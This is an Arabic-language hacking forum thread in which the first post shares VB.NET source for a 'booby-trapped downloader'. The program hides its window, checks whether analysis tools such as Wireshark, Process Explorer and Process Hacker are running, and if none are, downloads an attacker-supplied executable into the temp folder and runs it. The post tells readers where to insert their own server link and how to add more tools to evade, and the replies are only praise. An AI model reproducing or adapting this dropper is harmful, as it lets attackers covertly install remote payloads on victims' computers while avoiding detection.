1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : جـعـفـر الـشـمـري | المشاهدات : 690 | الردود : 24
حالة الموضوع:
مغلق
  1. جـعـفـر الـشـمـري DeveloPer Plus

    الأنتساب:
    ‏26 أغسطس 2015
    المشاركات:
    526
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    50
    الإقامة:
    العراق
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    [​IMG]
    كيف حالكم اعضاء وزوار عراق تيم


    ان شاء الله بخير اليوم حبيت ان اقدكم لكم موضوع


    عن تلغيمة داونلدر وتخطي برامج الفحص


    كود:
    Imports Microsoft.VisualBasic.CompilerServices
    Public Class Form1
    
    
        Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
    
    
       Me.Opacity = 0
            Timer1.Interval = 1000
            Timer1.Start()
    
    
        End Sub
    
    
        Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
    
    
            Dim ali() As String = {"cports", "Tcpview", "TcpEye", "procexp", "apateDNS", "IPBlocker", "ProcessExplorer", "SpeedGear", "wireshark", "DefenderDaemon", "ProcessHacker", "zlclient}
            If Process_Exist(ali) = False Then
    
    
                Dim web As New System.Net.WebClient
                web.DownloadFile("الرابط المباشر للسيرفر ", Environ("tmp") & "/exploer.exe")
                Shell(Environ("tmp") & "/exploer.exe")
            End If
        End Sub
        Private Function Process_Exist(ByVal Proc_Name As String()) As Boolean
            For Each p As Process In Process.GetProcesses
                Dim ProcessName As String = p.ProcessName.ToLower
                For Each p2 As String In Proc_Name
                    If ProcessName.Contains(p2.ToLower) Then
                        Return True
                        Exit Function
                    End If
                Next
            Next
            Timer1.Stop()
            Return False
        End Function
    End Class
    
    *=== تحديد كود ===*

    [​IMG]


    طريقة الاسخدان سهلة فقط ضع الرابط المباشر لسيرفرك بمكان الرابط المباشر للسيرفر الذي في الكود وغير exploer الى اسم سيرفرك
    وتستطيع تخطي برامج الفحص الباقية باضافة اسماء برامج الفحص بدون exe




    [​IMG]
     
  2. ShaGaGy_Hacker New Developer

    الأنتساب:
    ‏7 أكتوبر 2015
    المشاركات:
    2
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Perl
    Facebook:
    رد: تلغيمة داونلدر مع تخطي برامج الفحص

    وردة جعفوري
     
  3. جـعـفـر الـشـمـري DeveloPer Plus

    الأنتساب:
    ‏26 أغسطس 2015
    المشاركات:
    526
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    50
    الإقامة:
    العراق
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: تلغيمة داونلدر مع تخطي برامج الفحص

    نورتني حبيبي )4:"
     
  4. علي العامري أداري أقسام حماية الاجهزة مشرف

    الأنتساب:
    ‏18 سبتمبر 2015
    المشاركات:
    191
    الإعجابات المتلقاة:
    16
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Perl
    Facebook:
    YouTube:
    رد: تلغيمة داونلدر مع تخطي برامج الفحص

    استمر يابطل عاشت ايدك {1!$8}{1!$8}
     
  5. South Hack أبو حسين DeveloPer Plus

    الأنتساب:
    ‏15 نوفمبر 2014
    المشاركات:
    356
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    50
    الإقامة:
    الــعراق
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: تلغيمة داونلدر مع تخطي برامج الفحص

    عاشت أيدك حبيبي جعفر {1!$7}​
     
  6. جـعـفـر الـشـمـري DeveloPer Plus

    الأنتساب:
    ‏26 أغسطس 2015
    المشاركات:
    526
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    50
    الإقامة:
    العراق
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: تلغيمة داونلدر مع تخطي برامج الفحص

    انت العايش حبيبي
     
  7. جـعـفـر الـشـمـري DeveloPer Plus

    الأنتساب:
    ‏26 أغسطس 2015
    المشاركات:
    526
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    50
    الإقامة:
    العراق
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: تلغيمة داونلدر مع تخطي برامج الفحص

    نورت حبيبي
     
  8. Mira Mrmr .::|| زهره منتدى عراق تيم ||::. مشرفات المنتدى

    الأنتساب:
    ‏9 يوليو 2015
    المشاركات:
    696
    الإعجابات المتلقاة:
    149
    نقاط الجائزة:
    105
    الجنس:
    أنثى
    الإقامة:
    Baghdad
    نظام التشغيل:
    windows 8.1
    Facebook:
    YouTube:
    رد: تلغيمة داونلدر مع تخطي برامج الفحص

    [​IMG]عاشت ايدك ننتظر جديدك[​IMG]
     
  9. سكيورتي ارهابي ExpErt DeveloPer

    الأنتساب:
    ‏1 سبتمبر 2014
    المشاركات:
    701
    الإعجابات المتلقاة:
    48
    نقاط الجائزة:
    75
    الوظيفة:
    ماكسي مول
    الإقامة:
    دوله العراق العظيم
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: تلغيمة داونلدر مع تخطي برامج الفحص

    احسنت
     
  10. جـعـفـر الـشـمـري DeveloPer Plus

    الأنتساب:
    ‏26 أغسطس 2015
    المشاركات:
    526
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    50
    الإقامة:
    العراق
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    YouTube:
    رد: تلغيمة داونلدر مع تخطي برامج الفحص

    انرتي :!."
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة